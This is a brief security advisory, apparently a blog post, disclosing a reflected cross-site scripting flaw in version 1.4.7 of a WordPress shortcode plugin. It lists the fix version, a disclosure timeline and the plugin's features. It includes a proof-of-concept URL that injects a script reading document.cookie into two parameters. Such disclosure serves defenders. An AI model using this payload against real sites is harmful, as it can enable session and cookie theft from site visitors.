wp-plugin : aprils-super-functions-pack – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : aprils-super-functions-pack

 

Effected Version : 1.4.7 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
 http://localhost/wp-content/plugins/aprils-super-functions-pack/readme.php?type=type"><script>alert(document.cookie)</script>&page=page"><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : page, type

 

Type of XSS : Reflected

 

Fixed in : 1.4.8

 

Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833934%40aprils-super-functions-pack&old=742940%40aprils-super-functions-pack&sfp_email=&sfph_mail=

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Updated on 2014-01-06
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
This plugin contains a large number of shortcodes that makes it easy to lay out text on your site in more exciting ways than simply paragraphs, headers, and lists. There are also some template functions and useful javascript that theme developers may find useful.

Shortcodes:

* Columns - 2, 3, or 4
* Boxes with particular color, height, title
* Tabs (js-driven)
* Expand/Hide (js-driven)
* Buttons and icons
* Pull-quotes
* Dropcaps
* ... and more

Other Functions:

* Template function for displaying pages 'in the current section'
* Template function for displaying the image that belongs to a post
* JS to remove 'title' tags from WP-generated menus
* JS to allow pre-selecting a recipient from certain CForms forms
* JS to make suckerfish menus work in IE

Widgets:

* A replacement Text widget that lets you specify a class

Leave a Reply

Your email address will not be published. Required fields are marked *